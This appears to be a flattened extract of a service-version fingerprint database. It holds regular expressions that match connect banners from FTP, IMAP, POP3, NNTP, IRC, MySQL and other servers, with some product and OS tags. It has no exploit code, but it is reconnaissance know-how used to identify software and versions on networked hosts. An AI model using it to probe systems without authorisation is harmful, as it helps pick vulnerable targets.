EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at 